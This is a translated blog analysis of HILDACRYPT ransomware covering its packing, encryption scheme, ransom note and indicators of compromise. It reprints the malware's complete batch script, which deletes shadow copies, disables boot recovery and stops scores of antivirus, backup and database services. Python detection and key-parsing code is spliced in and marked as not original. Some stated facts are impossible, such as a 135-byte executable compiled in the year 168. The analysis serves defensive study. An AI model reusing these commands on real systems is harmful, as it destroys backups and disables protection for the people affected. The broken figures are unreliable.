Hello, Habr! Today we will talk about a new member of the ransomware family. HILDACRYPT, discovered in August 2019, belongs to the Hilda family and is named after the Netflix cartoon whose trailer is referenced in its ransom note. Below we describe how this ransomware works and list its indicators of compromise.
Hilda ransomware: the trailer posted on YouTube (embedded video)
Introduction
The ransomware is a PE32 .NET executable for MS Windows. The file size is 135 bytes. Both the main program code and the protector code are written in C#. According to the compilation timestamp, the binary was built on 14 September 168.
According to Detect It Easy, the ransomware is packed with Confuser and ConfuserEx, but these obfuscators are effectively the same: ConfuserEx is the successor of Confuser, so their code signatures are similar.
HILDACRYPT is in fact packed with ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Infection vector
Most likely, the ransomware body was found in a directory where it masqueraded as one of the XAMPP programs.
Obfuscation
The ransomware stores its strings in encrypted form; HILDACRYPT protects them with Base64 and AES-256-CBC.
Installation
First, the ransomware writes a file whose name is a GUID (Globally Unique Identifier) into %AppData%\Roaming. The bat file is dropped there, and the ransomware launches it through cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & exit
The batch script is then executed to stop services and processes on the system.
The script contains a long list of commands that disable antivirus products, shut down SQL servers, and stop backup-related security solutions.
For example, it tries to stop the Acronis Backup services, but without success. It can also stop the services of the following popular backup and security products: Veeam, Sophos, Kaspersky, McAfee and others.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop "Sophos Device Control Service" /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop "Zoolz 2 Service" /y
net stop McTaskManager /y
net stop "Sophos AutoUpdate Service" /y
net stop "Sophos System Protection Service" /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop "Symantec System Recovery" /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop "Sophos Health Service" /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop "Sophos Message Router" /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop "Sophos Clean Service" /y
net stop swi_update_64 /y
net stop "Sophos Web Control Service" /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop "Veeam Backup Catalog Data Service" /y
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop "Sophos MCS Client" /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop "SQLsafe Backup Service" /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop "Sophos Safestore Service" /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop "Sophos File Scanner Service" /y
net stop "Sophos Agent" /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop "Enterprise Client Service" /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop "SQL Backups" /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop "Sophos MCS Agent" /y
net stop RESvc /y
net stop "Acronis VSS Provider" /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop "SQLsafe Filter Service" /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
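As an added example (not part of the original analysis), the following Python triage logic runs over constructed process command lines modelled on the batch script above and flags the shadow-copy, boot-recovery and defence-service-stop behaviour a defender would alert on; the service-name fragments and the alert thresholds are my own choices.

```python
import re
from collections import Counter
# Constructed command lines, as an EDR or Sysmon Event ID 1 feed would record them.
SAMPLE_CMDLINES = [
    r"cmd.exe /c JKfgkgj3hjgfhjka.bat & exit",
    r"vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB",
    r"vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded",
    r"bcdedit /set {default} recoveryenabled No",
    r"bcdedit /set {default} bootstatuspolicy ignoreallfailures",
    r"vssadmin Delete Shadows /all /quiet",
    r'net stop "Sophos Device Control Service" /y',
    r"net stop VeeamBackupSvc /y",
    r"net stop MSSQLSERVER /y",
    r"net stop AcrSch2Svc /y",
    r"notepad.exe C:\Users\alice\notes.txt",   # benign noise
]
# Single-event indicators, each taken from one line of the batch script.
RULES = [
    ("shadow_storage_resize", re.compile(r"^vssadmin\s+resize\s+shadowstorage\b", re.I)),
    ("shadow_copy_delete", re.compile(r"^vssadmin\s+delete\s+shadows\b.*/all", re.I)),
    ("recovery_disabled", re.compile(r"^bcdedit\b.*recoveryenabled\s+no\b", re.I)),
    ("boot_failures_ignored", re.compile(r"^bcdedit\b.*bootstatuspolicy\s+ignoreallfailures\b", re.I)),
    ("bat_via_cmd", re.compile(r"^cmd(\.exe)?\s+/c\s+\S+\.bat\b", re.I)),
]
NET_STOP = re.compile(r'^net\s+stop\s+(?:"([^"]+)"|(\S+))', re.I)
# Fragments of the backup, AV and database service names the script targets (my selection).
SENSITIVE_SERVICE = re.compile(
    r"sophos|veeam|acr|mcafee|mfe|kav|klnagent|mssql|sqlagent|backupexec|symantec|wbengine|sqlwriter", re.I)
NET_STOP_THRESHOLD = 3   # this many sensitive stops in one batch is not routine housekeeping

def triage(cmdlines):
    """Return (per-rule hit counts, list of sensitive services stopped)."""
    hits, stopped = Counter(), []
    for line in (c.strip() for c in cmdlines):
        for name, pat in RULES:
            if pat.search(line):
                hits[name] += 1
        m = NET_STOP.match(line)
        if m:
            svc = m.group(1) or m.group(2)
            if SENSITIVE_SERVICE.search(svc):
                stopped.append(svc)
    if len(stopped) >= NET_STOP_THRESHOLD:
        hits["mass_defence_service_stop"] = len(stopped)
    return dict(hits), stopped

def verdict(hits):
    """Two or more distinct inhibit-recovery indicators is the alert threshold."""
    return "ransomware_precursor" if len(hits) >= 2 else "no_alert"
```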
After the services and processes listed above have been stopped, the cryptolocker checks that they are really gone. It uses the tasklist command to obtain details of all running processes:
tasklist v/fo csv
This command returns the list of running processes as comma-separated fields, for example:
"csrss.exe","448","services","0","1 896 КБ","unknown","Н/Д","0:00:03","Н/Д"
Once this list has been obtained, the ransomware starts the encryption process.
File encryption
HILDACRYPT skips the Recycle.Bin and Reference Assemblies\Microsoft folders together with all of their contents; the latter holds files such as dll and pdb that the .Net assemblies the ransomware itself depends on need. To find files to encrypt, it uses the following list of extensions:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
To encrypt files, the ransomware uses the AES-256-CBC algorithm. The key is 256 bits long and the initialisation vector (IV) is 16 bytes.
In the screenshot below, the values byte_2 and byte_1 are obtained with GetBytes().
Key and IV
The encrypted file carries the signature HCY!. Below is an example of an encrypted file. The key and IV above are written into this file.
Key encryption
The cryptolocker stores the generated AES key in the encrypted file. At the very end of the encrypted file there is a data block containing the markers HILDACRYPT, KEY, IV, the XML key and FileLen; it looks like this:
The AES key and IV are encrypted with RSA-2048 and then encoded with Base64. The RSA public key is stored in XML format among the encrypted strings in the body of the cryptolocker:
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
The RSA public key is used to encrypt the AES file key. The Base64-encoded RSA public key consists of a modulus and the public exponent 65537. Decryption requires the RSA private key, which only the attacker holds.
After RSA encryption, the AES key is written into the encrypted file in Base64.
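As an added example that is not part of the original article, the following Python code wraps the public-key material quoted above in the RSAKeyValue XML layout that .NET uses for RSA keys, parses it, and reports what a 2048-bit key with exponent 65537 means for recovery; the PKCS#1 v1.5 padding overhead is an assumption, since the article does not name the padding mode.

```python
import base64
import xml.etree.ElementTree as ET

# Modulus and exponent exactly as quoted in the analysis above ("...jQ==" then "AQAB").
MODULUS_B64 = (
    "28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+"
    "eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuT"
    "v+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiV"
    "Fud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7"
    "yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgL"
    "XP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ=="
)
# .NET's XML key layout (RSAKeyValue/Modulus/Exponent); a public key carries no D, P or Q.
PUBLIC_KEY_XML = (
    f"<RSAKeyValue><Modulus>{MODULUS_B64}</Modulus>"
    "<Exponent>AQAB</Exponent></RSAKeyValue>"
)

def parse_rsa_xml(xml_text):
    """Parse a .NET RSAKeyValue XML blob into (n, e, has_private_part)."""
    root = ET.fromstring(xml_text)
    if root.tag != "RSAKeyValue":
        raise ValueError("not an RSAKeyValue document")
    n = int.from_bytes(base64.b64decode(root.findtext("Modulus")), "big")
    e = int.from_bytes(base64.b64decode(root.findtext("Exponent")), "big")
    has_private = root.find("D") is not None   # private exponent present only in full keys
    return n, e, has_private

def key_report(n, e, has_private):
    """The facts an analyst wants: key size, exponent, and whether decryption is possible."""
    k = (n.bit_length() + 7) // 8              # modulus length in bytes
    return {
        "bits": n.bit_length(),
        "exponent": e,
        "odd_modulus": n % 2 == 1,             # an even modulus would be malformed
        # Assumption: PKCS#1 v1.5 padding (the .NET default), which costs 11 bytes per block.
        "max_payload_bytes": k - 11,
        # A 32-byte AES-256 key plus a 16-byte IV fits comfortably in one RSA block.
        "aes_key_iv_fit": 48 <= k - 11,
        "victim_can_decrypt": has_private,     # False here: only the attacker holds d
    }
```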
Ransom note
Once encryption is complete, HILDACRYPT writes an html file into the folder with the encrypted files. The ransom note contains two e-mail addresses through which the victim can contact the attacker:
- [email address removed]
- [email address removed]
The ransom note also contains the phrase "No loli is safe;)", a reference to the young-girl characters of Japanese anime and manga.
Conclusion
HILDACRYPT, a new ransomware family, has released a new version. Its encryption scheme prevents the victim from recovering files encrypted by the ransomware. The cryptolocker uses active protection methods to disable security services related to backup and antivirus. The author of HILDACRYPT is a fan of the Hilda cartoon series shown on Netflix; a link to its trailer is included in the ransom note.
Indicators of compromise
Encrypted file extension: HCY
HILDACRYPTreadMe.html
File name: xamp.exe (with a single "p")
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
source: www.habr.com